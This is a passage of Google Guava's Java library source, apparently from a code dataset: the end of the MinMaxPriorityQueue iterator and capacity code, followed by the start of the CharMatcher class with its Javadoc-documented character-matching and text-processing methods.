return (nextCursor < size()) || ((forgetMeNot != null) && !forgetMeNot.isEmpty());
}
@Override
public E next() {
checkModCount();
nextNotInSkipMe(cursor + 1);
if (nextCursor < size()) {
cursor = nextCursor;
canRemove = true;
return elementData(cursor);
} else if (forgetMeNot != null) {
cursor = size();
lastFromForgetMeNot = forgetMeNot.poll();
if (lastFromForgetMeNot != null) {
canRemove = true;
return lastFromForgetMeNot;
}
}
throw new NoSuchElementException("iterator moved past last element in queue.");
}
@Override
public void remove() {
checkRemove(canRemove);
checkModCount();
canRemove = false;
expectedModCount++;
if (cursor < size()) {
MoveDesc<E> moved = removeAt(cursor);
if (moved != null) {
// Either both are null or neither is, but we check both to satisfy the nullness checker.
if (forgetMeNot == null || skipMe == null) {
forgetMeNot = new ArrayDeque<>();
skipMe = new ArrayList<>(3);
}
if (!foundAndRemovedExactReference(skipMe, moved.toTrickle)) {
forgetMeNot.add(moved.toTrickle);
}
if (!foundAndRemovedExactReference(forgetMeNot, moved.replaced)) {
skipMe.add(moved.replaced);
}
}
cursor--;
nextCursor--;
} else { // we must have set lastFromForgetMeNot in next()
checkState(removeExact(requireNonNull(lastFromForgetMeNot)));
lastFromForgetMeNot = null;
}
}
/** Returns true if an exact reference (==) was found and removed from the supplied iterable. */
private boolean foundAndRemovedExactReference(Iterable<E> elements, E target) {
for (Iterator<E> it = elements.iterator(); it.hasNext(); ) {
E element = it.next();
if (element == target) {
it.remove();
return true;
}
}
return false;
}
/** Removes only this exact instance, not others that are equals() */
private boolean removeExact(Object target) {
for (int i = 0; i < size; i++) {
if (queue[i] == target) {
removeAt(i);
return true;
}
}
return false;
}
private void checkModCount() {
if (modCount != expectedModCount) {
throw new ConcurrentModificationException();
}
}
/**
* Advances nextCursor to the index of the first element after {@code c} that is not in {@code
* skipMe} and returns {@code size()} if there is no such element.
*/
private void nextNotInSkipMe(int c) {
if (nextCursor < c) {
if (skipMe != null) {
while (c < size() && foundAndRemovedExactReference(skipMe, elementData(c))) {
c++;
}
}
nextCursor = c;
}
}
}
/**
* Returns an iterator over the elements contained in this collection, <i>in no particular
* order</i>.
*
* <p>The iterator is <i>fail-fast</i>: If the MinMaxPriorityQueue is modified at any time after
* the iterator is created, in any way except through the iterator's own remove method, the
* iterator will generally throw a {@link ConcurrentModificationException}. Thus, in the face of
* concurrent modification, the iterator fails quickly and cleanly, rather than risking arbitrary,
* non-deterministic behavior at an undetermined time in the future.
*
* <p>Note that the fail-fast behavior of an iterator cannot be guaranteed as it is, generally
* speaking, impossible to make any hard guarantees in the presence of unsynchronized concurrent
* modification. Fail-fast iterators throw {@code ConcurrentModificationException} on a
* best-effort basis. Therefore, it would be wrong to write a program that depended on this
* exception for its correctness: <i>the fail-fast behavior of iterators should be used only to
* detect bugs.</i>
*
* @return an iterator over the elements contained in this collection
*/
@Override
public Iterator<E> iterator() {
return new QueueIterator();
}
@Override
public void clear() {
for (int i = 0; i < size; i++) {
queue[i] = null;
}
size = 0;
}
@Override
@J2ktIncompatible // Incompatible return type change. Use inherited (unoptimized) implementation
public Object[] toArray() {
Object[] copyTo = new Object[size];
System.arraycopy(queue, 0, copyTo, 0, size);
return copyTo;
}
/**
* Returns the comparator used to order the elements in this queue. Obeys the general contract of
* {@link PriorityQueue#comparator}, but returns {@link Ordering#natural} instead of {@code null}
* to indicate natural ordering.
*/
public Comparator<? super E> comparator() {
return minHeap.ordering;
}
@VisibleForTesting
int capacity() {
return queue.length;
}
// Size/capacity-related methods
private static final int DEFAULT_CAPACITY = 11;
@VisibleForTesting
static int initialQueueSize(
int configuredExpectedSize, int maximumSize, Iterable<?> initialContents) {
// Start with what they said, if they said it, otherwise DEFAULT_CAPACITY
int result =
(configuredExpectedSize == Builder.UNSET_EXPECTED_SIZE)
? DEFAULT_CAPACITY
: configuredExpectedSize;
// Enlarge to contain initial contents
if (initialContents instanceof Collection) {
int initialSize = ((Collection<?>) initialContents).size();
result = Math.max(result, initialSize);
}
// Now cap it at maxSize + 1
return capAtMaximumSize(result, maximumSize);
}
private void growIfNeeded() {
if (size > queue.length) {
int newCapacity = calculateNewCapacity();
Object[] newQueue = new Object[newCapacity];
System.arraycopy(queue, 0, newQueue, 0, queue.length);
queue = newQueue;
}
}
/** Returns ~2x the old capacity if small; ~1.5x otherwise. */
private int calculateNewCapacity() {
int oldCapacity = queue.length;
int newCapacity =
(oldCapacity < 64) ? (oldCapacity + 1) * 2 : IntMath.checkedMultiply(oldCapacity / 2, 3);
return capAtMaximumSize(newCapacity, maximumSize);
}
/** There's no reason for the queueSize to ever be more than maxSize + 1 */
private static int capAtMaximumSize(int queueSize, int maximumSize) {
return Math.min(queueSize - 1, maximumSize) + 1; // don't overflow
}
}
| google/guava | android/guava/src/com/google/common/collect/MinMaxPriorityQueue.java |
1,164 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.base;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkPositionIndex;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.VisibleForTesting;
import java.util.Arrays;
import java.util.BitSet;
/**
* Determines a true or false value for any Java {@code char} value, just as {@link Predicate} does
* for any {@link Object}. Also offers basic text processing methods based on this function.
* Implementations are strongly encouraged to be side-effect-free and immutable.
*
* <p>Throughout the documentation of this class, the phrase "matching character" is used to mean
* "any {@code char} value {@code c} for which {@code this.matches(c)} returns {@code true}".
*
* <p><b>Warning:</b> This class deals only with {@code char} values, that is, <a
* href="http://www.unicode.org/glossary/#BMP_character">BMP characters</a>. It does not understand
* <a href="http://www.unicode.org/glossary/#supplementary_code_point">supplementary Unicode code
* points</a> in the range {@code 0x10000} to {@code 0x10FFFF} which includes the majority of
* assigned characters, including important CJK characters and emoji.
*
* <p>Supplementary characters are <a
* href="https://docs.oracle.com/javase/8/docs/api/java/lang/Character.html#supplementary">encoded
* into a {@code String} using surrogate pairs</a>, and a {@code CharMatcher} treats these just as
* two separate characters. {@link #countIn} counts each supplementary character as 2 {@code char}s.
*
* <p>For up-to-date Unicode character properties (digit, letter, etc.) and support for
* supplementary code points, use ICU4J UCharacter and UnicodeSet (freeze() after building). For
* basic text processing based on UnicodeSet use the ICU4J UnicodeSetSpanner.
*
* <p>Example usages:
*
* <pre>
* String trimmed = {@link #whitespace() whitespace()}.{@link #trimFrom trimFrom}(userInput);
* if ({@link #ascii() ascii()}.{@link #matchesAllOf matchesAllOf}(s)) { ... }</pre>
*
* <p>See the Guava User Guide article on <a
* href="https://github.com/google/guava/wiki/StringsExplained#charmatcher">{@code CharMatcher}
* </a>.
*
* @author Kevin Bourrillion
* @since 1.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public abstract class CharMatcher implements Predicate<Character> {
/*
* N777777777NO
* N7777777777777N
* M777777777777777N
* $N877777777D77777M
* N M77777777ONND777M
* MN777777777NN D777
* N7ZN777777777NN ~M7778
* N777777777777MMNN88777N
* N777777777777MNZZZ7777O
* DZN7777O77777777777777
* N7OONND7777777D77777N
* 8$M++++?N???$77777$
* M7++++N+M77777777N
* N77O777777777777$ M
* DNNM$$$$777777N D
* N$N:=N$777N7777M NZ
* 77Z::::N777777777 ODZZZ
* 77N::::::N77777777M NNZZZ$
* $777:::::::77777777MN ZM8ZZZZZ
* 777M::::::Z7777777Z77 N++ZZZZNN
* 7777M:::::M7777777$777M $++IZZZZM
* M777$:::::N777777$M7777M +++++ZZZDN
* NN$::::::7777$$M777777N N+++ZZZZNZ
* N::::::N:7$O:77777777 N++++ZZZZN
* M::::::::::::N77777777+ +?+++++ZZZM
* 8::::::::::::D77777777M O+++++ZZ
* ::::::::::::M777777777N O+?D
* M:::::::::::M77777777778 77=
* D=::::::::::N7777777777N 777
* INN===::::::=77777777777N I777N
* ?777N========N7777777777787M N7777
* 77777$D======N77777777777N777N? N777777
* I77777$$$N7===M$$77777777$77777777$MMZ77777777N
* $$$$$$$$$$$NIZN$$$$$$$$$M$$7777777777777777ON
* M$$$$$$$$M M$$$$$$$$N=N$$$$7777777$$$ND
* O77Z$$$$$$$ M$$$$$$$$MNI==$DNNNNM=~N
* 7 :N MNN$$$$M$ $$$777$8 8D8I
* NMM.:7O 777777778
* 7777777MN
* M NO .7:
* M : M
* 8
*/
// Constant matcher factory methods
/**
* Matches any character.
*
* @since 19.0 (since 1.0 as constant {@code ANY})
*/
public static CharMatcher any() {
return Any.INSTANCE;
}
/**
* Matches no characters.
*
* @since 19.0 (since 1.0 as constant {@code NONE})
*/
public static CharMatcher none() {
return None.INSTANCE;
}
/**
* Determines whether a character is whitespace according to the latest Unicode standard, as
* illustrated <a
* href="http://unicode.org/cldr/utility/list-unicodeset.jsp?a=%5Cp%7Bwhitespace%7D">here</a>.
* This is not the same definition used by other Java APIs. (See a <a
* href="https://goo.gl/Y6SLWx">comparison of several definitions of "whitespace"</a>.)
*
* <p>All Unicode White_Space characters are on the BMP and thus supported by this API.
*
* <p><b>Note:</b> as the Unicode definition evolves, we will modify this matcher to keep it up to
* date.
*
* @since 19.0 (since 1.0 as constant {@code WHITESPACE})
*/
public static CharMatcher whitespace() {
return Whitespace.INSTANCE;
}
/**
* Determines whether a character is a breaking whitespace (that is, a whitespace which can be
* interpreted as a break between words for formatting purposes). See {@link #whitespace()} for a
* discussion of that term.
*
* @since 19.0 (since 2.0 as constant {@code BREAKING_WHITESPACE})
*/
public static CharMatcher breakingWhitespace() {
return BreakingWhitespace.INSTANCE;
}
/**
* Determines whether a character is ASCII, meaning that its code point is less than 128.
*
* @since 19.0 (since 1.0 as constant {@code ASCII})
*/
public static CharMatcher ascii() {
return Ascii.INSTANCE;
}
/**
* Determines whether a character is a BMP digit according to <a
* href="http://unicode.org/cldr/utility/list-unicodeset.jsp?a=%5Cp%7Bdigit%7D">Unicode</a>. If
* you only care to match ASCII digits, you can use {@code inRange('0', '9')}.
*
* @deprecated Many digits are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code DIGIT})
*/
@Deprecated
public static CharMatcher digit() {
return Digit.INSTANCE;
}
/**
* Determines whether a character is a BMP digit according to {@linkplain Character#isDigit(char)
* Java's definition}. If you only care to match ASCII digits, you can use {@code inRange('0',
* '9')}.
*
* @deprecated Many digits are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_DIGIT})
*/
@Deprecated
public static CharMatcher javaDigit() {
return JavaDigit.INSTANCE;
}
/**
* Determines whether a character is a BMP letter according to {@linkplain
* Character#isLetter(char) Java's definition}. If you only care to match letters of the Latin
* alphabet, you can use {@code inRange('a', 'z').or(inRange('A', 'Z'))}.
*
* @deprecated Most letters are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_LETTER})
*/
@Deprecated
public static CharMatcher javaLetter() {
return JavaLetter.INSTANCE;
}
/**
* Determines whether a character is a BMP letter or digit according to {@linkplain
* Character#isLetterOrDigit(char) Java's definition}.
*
* @deprecated Most letters and digits are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_LETTER_OR_DIGIT}).
*/
@Deprecated
public static CharMatcher javaLetterOrDigit() {
return JavaLetterOrDigit.INSTANCE;
}
/**
* Determines whether a BMP character is upper case according to {@linkplain
* Character#isUpperCase(char) Java's definition}.
*
* @deprecated Some uppercase characters are supplementary characters; see the class
* documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_UPPER_CASE})
*/
@Deprecated
public static CharMatcher javaUpperCase() {
return JavaUpperCase.INSTANCE;
}
/**
* Determines whether a BMP character is lower case according to {@linkplain
* Character#isLowerCase(char) Java's definition}.
*
* @deprecated Some lowercase characters are supplementary characters; see the class
* documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_LOWER_CASE})
*/
@Deprecated
public static CharMatcher javaLowerCase() {
return JavaLowerCase.INSTANCE;
}
/**
* Determines whether a character is an ISO control character as specified by {@link
* Character#isISOControl(char)}.
*
* <p>All ISO control codes are on the BMP and thus supported by this API.
*
* @since 19.0 (since 1.0 as constant {@code JAVA_ISO_CONTROL})
*/
public static CharMatcher javaIsoControl() {
return JavaIsoControl.INSTANCE;
}
/**
* Determines whether a character is invisible; that is, if its Unicode category is any of
* SPACE_SEPARATOR, LINE_SEPARATOR, PARAGRAPH_SEPARATOR, CONTROL, FORMAT, SURROGATE, and
* PRIVATE_USE according to ICU4J.
*
* <p>See also the Unicode Default_Ignorable_Code_Point property (available via ICU).
*
* @deprecated Most invisible characters are supplementary characters; see the class
* documentation.
* @since 19.0 (since 1.0 as constant {@code INVISIBLE})
*/
@Deprecated
public static CharMatcher invisible() {
return Invisible.INSTANCE;
}
/**
* Determines whether a character is single-width (not double-width). When in doubt, this matcher
* errs on the side of returning {@code false} (that is, it tends to assume a character is
* double-width).
*
* <p><b>Note:</b> as the reference file evolves, we will modify this matcher to keep it up to
* date.
*
* <p>See also <a href="http://www.unicode.org/reports/tr11/">UAX #11 East Asian Width</a>.
*
* @deprecated Many such characters are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code SINGLE_WIDTH})
*/
@Deprecated
public static CharMatcher singleWidth() {
return SingleWidth.INSTANCE;
}
// Static factories
/** Returns a {@code char} matcher that matches only one specified BMP character. */
public static CharMatcher is(final char match) {
return new Is(match);
}
/**
* Returns a {@code char} matcher that matches any character except the BMP character specified.
*
* <p>To negate another {@code CharMatcher}, use {@link #negate()}.
*/
public static CharMatcher isNot(final char match) {
return new IsNot(match);
}
/**
* Returns a {@code char} matcher that matches any BMP character present in the given character
* sequence. Returns a bogus matcher if the sequence contains supplementary characters.
*/
public static CharMatcher anyOf(final CharSequence sequence) {
switch (sequence.length()) {
case 0:
return none();
case 1:
return is(sequence.charAt(0));
case 2:
return isEither(sequence.charAt(0), sequence.charAt(1));
default:
// TODO(lowasser): is it potentially worth just going ahead and building a precomputed
// matcher?
return new AnyOf(sequence);
}
}
/**
* Returns a {@code char} matcher that matches any BMP character not present in the given
* character sequence. Returns a bogus matcher if the sequence contains supplementary characters.
*/
public static CharMatcher noneOf(CharSequence sequence) {
return anyOf(sequence).negate();
}
/**
* Returns a {@code char} matcher that matches any character in a given BMP range (both endpoints
* are inclusive). For example, to match any lowercase letter of the English alphabet, use {@code
* CharMatcher.inRange('a', 'z')}.
*
* @throws IllegalArgumentException if {@code endInclusive < startInclusive}
*/
public static CharMatcher inRange(final char startInclusive, final char endInclusive) {
return new InRange(startInclusive, endInclusive);
}
/**
* Returns a matcher with identical behavior to the given {@link Character}-based predicate, but
* which operates on primitive {@code char} instances instead.
*/
public static CharMatcher forPredicate(final Predicate<? super Character> predicate) {
return predicate instanceof CharMatcher ? (CharMatcher) predicate : new ForPredicate(predicate);
}
// Constructors
/**
* Constructor for use by subclasses. When subclassing, you may want to override {@code
* toString()} to provide a useful description.
*/
protected CharMatcher() {}
// Abstract methods
/** Determines a true or false value for the given character. */
public abstract boolean matches(char c);
// Non-static factories
/** Returns a matcher that matches any character not matched by this matcher. */
// @Override under Java 8 but not under Java 7
public CharMatcher negate() {
return new Negated(this);
}
/**
* Returns a matcher that matches any character matched by both this matcher and {@code other}.
*/
public CharMatcher and(CharMatcher other) {
return new And(this, other);
}
/**
* Returns a matcher that matches any character matched by either this matcher or {@code other}.
*/
public CharMatcher or(CharMatcher other) {
return new Or(this, other);
}
/**
* Returns a {@code char} matcher functionally equivalent to this one, but which may be faster to
* query than the original; your mileage may vary. Precomputation takes time and is likely to be
* worthwhile only if the precomputed matcher is queried many thousands of times.
*
* <p>This method has no effect (returns {@code this}) when called in GWT: it's unclear whether a
* precomputed matcher is faster, but it certainly consumes more memory, which doesn't seem like a
* worthwhile tradeoff in a browser.
*/
public CharMatcher precomputed() {
return Platform.precomputeCharMatcher(this);
}
private static final int DISTINCT_CHARS = Character.MAX_VALUE - Character.MIN_VALUE + 1;
/**
* This is the actual implementation of {@link #precomputed}, but we bounce calls through a method
* on {@link Platform} so that we can have different behavior in GWT.
*
* <p>This implementation tries to be smart in a number of ways. It recognizes cases where the
* negation is cheaper to precompute than the matcher itself; it tries to build small hash tables
* for matchers that only match a few characters, and so on. In the worst-case scenario, it
* constructs an eight-kilobyte bit array and queries that. In many situations this produces a
* matcher which is faster to query than the original.
*/
@GwtIncompatible // SmallCharMatcher
CharMatcher precomputedInternal() {
final BitSet table = new BitSet();
setBits(table);
int totalCharacters = table.cardinality();
if (totalCharacters * 2 <= DISTINCT_CHARS) {
return precomputedPositive(totalCharacters, table, toString());
} else {
// TODO(lowasser): is it worth it to worry about the last character of large matchers?
table.flip(Character.MIN_VALUE, Character.MAX_VALUE + 1);
int negatedCharacters = DISTINCT_CHARS - totalCharacters;
String suffix = ".negate()";
final String description = toString();
String negatedDescription =
description.endsWith(suffix)
? description.substring(0, description.length() - suffix.length())
: description + suffix;
return new NegatedFastMatcher(
precomputedPositive(negatedCharacters, table, negatedDescription)) {
@Override
public String toString() {
return description;
}
};
}
}
/**
* Helper method for {@link #precomputedInternal} that doesn't test if the negation is cheaper.
*/
@GwtIncompatible // SmallCharMatcher
private static CharMatcher precomputedPositive(
int totalCharacters, BitSet table, String description) {
switch (totalCharacters) {
case 0:
return none();
case 1:
return is((char) table.nextSetBit(0));
case 2:
char c1 = (char) table.nextSetBit(0);
char c2 = (char) table.nextSetBit(c1 + 1);
return isEither(c1, c2);
default:
return isSmall(totalCharacters, table.length())
? SmallCharMatcher.from(table, description)
: new BitSetMatcher(table, description);
}
}
@GwtIncompatible // SmallCharMatcher
private static boolean isSmall(int totalCharacters, int tableLength) {
return totalCharacters <= SmallCharMatcher.MAX_SIZE
&& tableLength > (totalCharacters * 4 * Character.SIZE);
// err on the side of BitSetMatcher
}
/** Sets bits in {@code table} matched by this matcher. */
@GwtIncompatible // used only from other GwtIncompatible code
void setBits(BitSet table) {
for (int c = Character.MAX_VALUE; c >= Character.MIN_VALUE; c--) {
if (matches((char) c)) {
table.set(c);
}
}
}
// Text processing routines
/**
* Returns {@code true} if a character sequence contains at least one matching BMP character.
* Equivalent to {@code !matchesNoneOf(sequence)}.
*
* <p>The default implementation iterates over the sequence, invoking {@link #matches} for each
* character, until this returns {@code true} or the end is reached.
*
* @param sequence the character sequence to examine, possibly empty
* @return {@code true} if this matcher matches at least one character in the sequence
* @since 8.0
*/
public boolean matchesAnyOf(CharSequence sequence) {
return !matchesNoneOf(sequence);
}
/**
* Returns {@code true} if a character sequence contains only matching BMP characters.
*
* <p>The default implementation iterates over the sequence, invoking {@link #matches} for each
* character, until this returns {@code false} or the end is reached.
*
* @param sequence the character sequence to examine, possibly empty
* @return {@code true} if this matcher matches every character in the sequence, including when
* the sequence is empty
*/
public boolean matchesAllOf(CharSequence sequence) {
for (int i = sequence.length() - 1; i >= 0; i--) {
if (!matches(sequence.charAt(i))) {
return false;
}
}
return true;
}
/**
* Returns {@code true} if a character sequence contains no matching BMP characters. Equivalent to
* {@code !matchesAnyOf(sequence)}.
*
* <p>The default implementation iterates over the sequence, invoking {@link #matches} for each
* character, until this returns {@code true} or the end is reached.
*
* @param sequence the character sequence to examine, possibly empty
* @return {@code true} if this matcher matches no characters in the sequence, including when the
* sequence is empty
*/
public boolean matchesNoneOf(CharSequence sequence) {
return indexIn(sequence) == -1;
}
/**
* Returns the index of the first matching BMP character in a character sequence, or {@code -1} if
* no matching character is present.
*
* <p>The default implementation iterates over the sequence in forward order calling {@link
* #matches} for each character.
*
* @param sequence the character sequence to examine from the beginning
* @return an index, or {@code -1} if no character matches
*/
public int indexIn(CharSequence sequence) {
return indexIn(sequence, 0);
}
/**
* Returns the index of the first matching BMP character in a character sequence, starting from a
* given position, or {@code -1} if no character matches after that position.
*
* <p>The default implementation iterates over the sequence in forward order, beginning at {@code
* start}, calling {@link #matches} for each character.
*
* @param sequence the character sequence to examine
* @param start the first index to examine; must be nonnegative and no greater than {@code
* sequence.length()}
* @return the index of the first matching character, guaranteed to be no less than {@code start},
* or {@code -1} if no character matches
* @throws IndexOutOfBoundsException if start is negative or greater than {@code
* sequence.length()}
*/
public int indexIn(CharSequence sequence, int start) {
int length = sequence.length();
checkPositionIndex(start, length);
for (int i = start; i < length; i++) {
if (matches(sequence.charAt(i))) {
return i;
}
}
return -1;
}
/**
* Returns the index of the last matching BMP character in a character sequence, or {@code -1} if
* no matching character is present.
*
* <p>The default implementation iterates over the sequence in reverse order calling {@link
* #matches} for each character.
*
* @param sequence the character sequence to examine from the end
* @return an index, or {@code -1} if no character matches
*/
public int lastIndexIn(CharSequence sequence) {
for (int i = sequence.length() - 1; i >= 0; i--) {
if (matches(sequence.charAt(i))) {
return i;
}
}
return -1;
}
/**
* Returns the number of matching {@code char}s found in a character sequence.
*
* <p>Counts 2 per supplementary character, such as for {@link #whitespace}().{@link #negate}().
*/
public int countIn(CharSequence sequence) {
int count = 0;
for (int i = 0; i < sequence.length(); i++) {
if (matches(sequence.charAt(i))) {
count++;
}
}
return count;
}
/**
* Returns a string containing all non-matching characters of a character sequence, in order. For
* example:
*
* <pre>{@code
* CharMatcher.is('a').removeFrom("bazaar")
* }</pre>
*
* ... returns {@code "bzr"}.
*/
public String removeFrom(CharSequence sequence) {
String string = sequence.toString();
int pos = indexIn(string);
if (pos == -1) {
return string;
}
char[] chars = string.toCharArray();
int spread = 1;
// This unusual loop comes from extensive benchmarking
OUT:
while (true) {
pos++;
while (true) {
if (pos == chars.length) {
break OUT;
}
if (matches(chars[pos])) {
break;
}
chars[pos - spread] = chars[pos];
pos++;
}
spread++;
}
return new String(chars, 0, pos - spread);
}
/**
* Returns a string containing all matching BMP characters of a character sequence, in order. For
* example:
*
* <pre>{@code
* CharMatcher.is('a').retainFrom("bazaar")
* }</pre>
*
* ... returns {@code "aaa"}.
*/
public String retainFrom(CharSequence sequence) {
return negate().removeFrom(sequence);
}
/**
* Returns a string copy of the input character sequence, with each matching BMP character
* replaced by a given replacement character. For example:
*
* <pre>{@code
* CharMatcher.is('a').replaceFrom("radar", 'o')
* }</pre>
*
* ... returns {@code "rodor"}.
*
* <p>The default implementation uses {@link #indexIn(CharSequence)} to find the first matching
* character, then iterates the remainder of the sequence calling {@link #matches(char)} for each
* character.
*
* @param sequence the character sequence to replace matching characters in
* @param replacement the character to append to the result string in place of each matching
* character in {@code sequence}
* @return the new string
*/
public String replaceFrom(CharSequence sequence, char replacement) {
String string = sequence.toString();
int pos = indexIn(string);
if (pos == -1) {
return string;
}
char[] chars = string.toCharArray();
chars[pos] = replacement;
for (int i = pos + 1; i < chars.length; i++) {
if (matches(chars[i])) {
chars[i] = replacement;
}
}
return new String(chars);
}
/**
* Returns a string copy of the input character sequence, with each matching BMP character
* replaced by a given replacement sequence. For example:
*
* <pre>{@code
* CharMatcher.is('a').replaceFrom("yaha", "oo")
* }</pre>
*
* ... returns {@code "yoohoo"}.
*
* <p><b>Note:</b> If the replacement is a fixed string with only one character, you are better
* off calling {@link #replaceFrom(CharSequence, char)} directly.
*
* @param sequence the character sequence to replace matching characters in
* @param replacement the characters to append to the result string in place of each matching
* character in {@code sequence}
* @return the new string
*/
public String replaceFrom(CharSequence sequence, CharSequence replacement) {
int replacementLen = replacement.length();
if (replacementLen == 0) {
return removeFrom(sequence);
}
if (replacementLen == 1) {
return replaceFrom(sequence, replacement.charAt(0));
}
String string = sequence.toString();
int pos = indexIn(string);
if (pos == -1) {
return string;
}
int len = string.length();
StringBuilder buf = new StringBuilder((len * 3 / 2) + 16);
int oldpos = 0;
do {
buf.append(string, oldpos, pos);
buf.append(replacement);
oldpos = pos + 1;
pos = indexIn(string, oldpos);
} while (pos != -1);
buf.append(string, oldpos, len);
return buf.toString();
}
/**
* Returns a substring of the input character sequence that omits all matching BMP characters from
* the beginning and from the end of the string. For example:
*
* <pre>{@code
* CharMatcher.anyOf("ab").trimFrom("abacatbab")
* }</pre>
*
* ... returns {@code "cat"}.
*
* <p>Note that:
*
* <pre>{@code
* CharMatcher.inRange('\0', ' ').trimFrom(str)
* }</pre>
*
* ... is equivalent to {@link String#trim()}.
*/
public String trimFrom(CharSequence sequence) {
int len = sequence.length();
int first;
int last;
for (first = 0; first < len; first++) {
if (!matches(sequence.charAt(first))) {
break;
}
}
for (last = len - 1; last > first; last--) {
if (!matches(sequence.charAt(last))) {
break;
}
}
return sequence.subSequence(first, last + 1).toString();
}
/**
* Returns a substring of the input character sequence that omits all matching BMP characters from
* the beginning of the string. For example:
*
* <pre>{@code
* CharMatcher.anyOf("ab").trimLeadingFrom("abacatbab")
* }</pre>
*
* ... returns {@code "catbab"}.
*/
public String trimLeadingFrom(CharSequence sequence) {
int len = sequence.length();
for (int first = 0; first < len; first++) {
if (!matches(sequence.charAt(first))) {
return sequence.subSequence(first, len).toString();
}
}
return "";
}
/**
* Returns a substring of the input character sequence that omits all matching BMP characters from
* the end of the string. For example:
*
* <pre>{@code
* CharMatcher.anyOf("ab").trimTrailingFrom("abacatbab")
* }</pre>
*
* ... returns {@code "abacat"}.
*/
public String trimTrailingFrom(CharSequence sequence) {
int len = sequence.length();
for (int last = len - 1; last >= 0; last--) {
if (!matches(sequence.charAt(last))) {
return sequence.subSequence(0, last + 1).toString();
}
}
return "";
}
/**
* Returns a string copy of the input character sequence, with each group of consecutive matching
* BMP characters replaced by a single replacement character. For example:
*
* <pre>{@code
* CharMatcher.anyOf("eko").collapseFrom("bookkeeper", '-')
* }</pre>
*
* ... returns {@code "b-p-r"}.
*
* <p>The default implementation uses {@link #indexIn(CharSequence)} to find the first matching
* character, then iterates the remainder of the sequence calling {@link #matches(char)} for each
* character.
*
* @param sequence the character sequence to replace matching groups of characters in
* @param replacement the character to append to the result string in place of each group of
* matching characters in {@code sequence}
* @return the new string
*/
public String collapseFrom(CharSequence sequence, char replacement) {
// This implementation avoids unnecessary allocation.
int len = sequence.length();
for (int i = 0; i < len; i++) {
char c = sequence.charAt(i);
if (matches(c)) {
if (c == replacement && (i == len - 1 || !matches(sequence.charAt(i + 1)))) {
// a no-op replacement
i++;
} else {
StringBuilder builder = new StringBuilder(len).append(sequence, 0, i).append(replacement);
return finishCollapseFrom(sequence, i + 1, len, replacement, builder, true);
}
}
}
// no replacement needed
return sequence.toString();
}
/**
* Collapses groups of matching characters exactly as {@link #collapseFrom} does, except that
* groups of matching BMP characters at the start or end of the sequence are removed without
* replacement.
*/
public String trimAndCollapseFrom(CharSequence sequence, char replacement) {
// This implementation avoids unnecessary allocation.
int len = sequence.length();
int first = 0;
int last = len - 1;
while (first < len && matches(sequence.charAt(first))) {
first++;
}
while (last > first && matches(sequence.charAt(last))) {
last--;
}
return (first == 0 && last == len - 1)
? collapseFrom(sequence, replacement)
: finishCollapseFrom(
sequence, first, last + 1, replacement, new StringBuilder(last + 1 - first), false);
}
private String finishCollapseFrom(
CharSequence sequence,
int start,
int end,
char replacement,
StringBuilder builder,
boolean inMatchingGroup) {
for (int i = start; i < end; i++) {
char c = sequence.charAt(i);
if (matches(c)) {
if (!inMatchingGroup) {
builder.append(replacement);
inMatchingGroup = true;
}
} else {
builder.append(c);
inMatchingGroup = false;
}
}
return builder.toString();
}
/**
* @deprecated Provided only to satisfy the {@link Predicate} interface; use {@link #matches}
* instead.
*/
@Deprecated
@Override
public boolean apply(Character character) {
return matches(character);
}
/**
* Returns a string representation of this {@code CharMatcher}, such as {@code
* CharMatcher.or(WHITESPACE, JAVA_DIGIT)}.
*/
@Override
public String toString() {
return super.toString();
}
/**
* Returns the Java Unicode escape sequence for the given {@code char}, in the form "\u12AB" where
* "12AB" is the four hexadecimal digits representing the 16-bit code unit.
*/
private static String showCharacter(char c) {
String hex = "0123456789ABCDEF";
char[] tmp = {'\\', 'u', '\0', '\0', '\0', '\0'};
for (int i = 0; i < 4; i++) {
tmp[5 - i] = hex.charAt(c & 0xF);
c = (char) (c >> 4);
}
return String.copyValueOf(tmp);
}
// Fast matchers
/** A matcher for which precomputation will not yield any significant benefit. */
abstract static class FastMatcher extends CharMatcher {
@Override
public final CharMatcher precomputed() {
return this;
}
@Override
public CharMatcher negate() {
return new NegatedFastMatcher(this);
}
}
/** {@link FastMatcher} which overrides {@code toString()} with a custom name. */
abstract static class NamedFastMatcher extends FastMatcher {
private final String description;
NamedFastMatcher(String description) {
this.description = checkNotNull(description);
}
@Override
public final String toString() {
return description;
}
}
/** Negation of a {@link FastMatcher}. */
private static class NegatedFastMatcher extends Negated {
NegatedFastMatcher(CharMatcher original) {
super(original);
}
@Override
public final CharMatcher precomputed() {
return this;
}
}
/** Fast matcher using a {@link BitSet} table of matching characters. */
@GwtIncompatible // used only from other GwtIncompatible code
private static final class BitSetMatcher extends NamedFastMatcher {
private final BitSet table;
private BitSetMatcher(BitSet table, String description) {
super(description);
if (table.length() + Long.SIZE < table.size()) {
table = (BitSet) table.clone();
// If only we could actually call BitSet.trimToSize() ourselves...
}
this.table = table;
}
@Override
public boolean matches(char c) {
return table.get(c);
}
@Override
void setBits(BitSet bitSet) {
bitSet.or(table);
}
}
// Static constant implementation classes
/** Implementation of {@link #any()}. */
private static final class Any extends NamedFastMatcher {
static final CharMatcher INSTANCE = new Any();
private Any() {
super("CharMatcher.any()");
}
@Override
public boolean matches(char c) {
return true;
}
@Override
public int indexIn(CharSequence sequence) {
return (sequence.length() == 0) ? -1 : 0;
}
@Override
public int indexIn(CharSequence sequence, int start) {
